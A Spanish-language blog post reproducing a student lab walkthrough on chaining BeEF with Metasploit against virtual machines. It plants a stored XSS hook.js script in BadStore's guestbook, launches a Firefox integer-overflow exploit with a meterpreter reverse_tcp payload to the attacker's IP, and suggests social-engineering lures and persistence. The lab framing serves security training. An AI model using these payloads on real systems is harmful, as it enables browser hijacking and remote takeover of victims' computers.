Los estudiantes de la Universidad Autonoma de Occidente que se encuntran realizando la especializacion en seguridad informatica han hecho este excelente trabajo sobre como podemos nosotros integrar BeEF con Metasploit. Los Destacados estudiantes son Antonio Rafael Gálvez Horna, Jesús Andrés Montoya Saavedra, Jorge Andrés Cultid Mejía.
Les transcribo entonces el trabajo realizado por ellos esperamos que lo aprovechen y aprendan arto.
*********************************************************************************************************************************
Integrando un Ataque utilizando BeEF y Metasploit
Escenario:
Para
el siguiente ataque estamos utilizando un escenario controlado mediante la
utilización de lo siguiente:
-
Maquina virtual Windows:
Equipo Víctima
-
Máquina virtual BackTrack R3:
Equipo del Atacante con herramientas para el objetivo
-
Máquina virtual BadStore
123s: Sitio Online de la Tienda Virtual vulnerable
Segmento de RED
Todas
las máquinas virtuales comprenderán el segmento 192.168.0.0/24
Herramientas a Utilizar
-
BeEF
-
Metasploit
Alcance del Ataque
- Comprometer al Equipo Víctima
-
Explotar la vulnerabilidad
XSS
- Asegurar
la permanencia
- Mediante los plugin de Metasploit que integramos en BeEF
EMPECEMOS
PASO
1:
Vamos
a integrar BeEF con Metasploit, para ello necesitamos editar el archivo config.yaml ubicado en /pentest/web/beef
En la línea
metasploit:
enable: true
Grabamos
y luego nos dirigimos al directorio /pentest/web/beef/extensions/metasploit
y editamos el archivo config.yaml
Modificamos las línea como se muestran a
continuación, dando la IP de nuestra máquina que aloja BeEF, en este caso
BT5R3, grabamos y salimos.
PASO
2
Una vez hecho las configuraciones en BeEF
ejecutamos nuestro Metasploit de la siguiente manera:
Esperamos
hasta que cargue por completo Metasploit y en la línea de comandos ejecutar lo
siguiente:
msf> load msgrpc SeverHost=192.168.0.20
Pass=beef
Recuerden que la IP fue la que colocamos en
el archive config.yaml y también
seteamos nuestro password, en este caso “beef”
Listo ya tenemos los plugin a la espera de se
utilizados en BeEF
PASO
3:
Ejecutamos BeEF de la siguiente manera:
En nuestro navegador ingresamos a la
siguiente dirección URL para acceder al panel de control.
Como observamos nos hay ninguna máquina
zombi.
PASO
4:
Hasta
aquí tenemos casi el 40% de nuestro ataque, pero para concretarlo necesitamos
una carnada, en este caso BADSTORE será el sitio ya que posee
vulnerabilidades XSS en su codificación.
Bien vamos a ir al libro de visitas para
firmar y a la vez cargar nuestro script “hook,js”
(la carnada)
Manos
a la obra <script
src=http://ip_bactrack_beef:3000/hook.js></script>
PASO 5:
Pues
aquí nos tocaría esperar que nuestra víctima firme el libro de visitas para que
se convierta en zombi de nuestro BeEF
No
tenemos tan mala suerte y una víctima procedió a firmar el libro de visitas,
aquí se recomendaría publicitarlo por algún método de ingeniería social.
PASO 6:
De
vuelta a nuestro panel de control de BeEF nos damos cuenta que ya tenemos
objetivos zombis, nuestra víctima con IP
192.168.0.100
En
la pestaña Detalles podemos revisar
las características del sistema zombi, y con ello podremos enfocarnos en las
vulnerabilidades que presenta el sistema objetivo.
Ahora
que tenemos más claro las características de nuestra víctima nos dirigimos a la
pestaña de comandos / Metasploit
Escogemos
Mozilla Firefox Array.reduceRight() Integer Overflow y llenamos lo siguiente:
SRVHOST: 192.168.0.20 (ip de nuestra máquina BT)
SRVPORT: 8080
PAYLOAD: windows/meterpreter/reverse_tcp
LPORT: 4444 (si estuviera ocupado escoger
otro)
EXITFUNC: process
PASO 8:
Nos
dirigimos a la consola de Metasploit
y nos damos cuenta que tenemos session.
Probamos
con los comandos:
meterpreter>getuid
meterpreter>sysinfo
Como
podemos observar que al tener session
meterpreter podemos escalar privilegios y garantizar la conexión para no
depender de BeEF, ya que cuando la
víctima salga del sitio sabemos que perdemos la máquina zombi.
Espero
les haya gustado.
*********************************************************************************************************************************
Si lo desean lo pueden Descargar en formato PDF desde acá.
Salud2
Th3h@Ck¡_@dM¡n
Th3h@Ck¡_@dM¡n
Muy bueno.
ResponderEliminar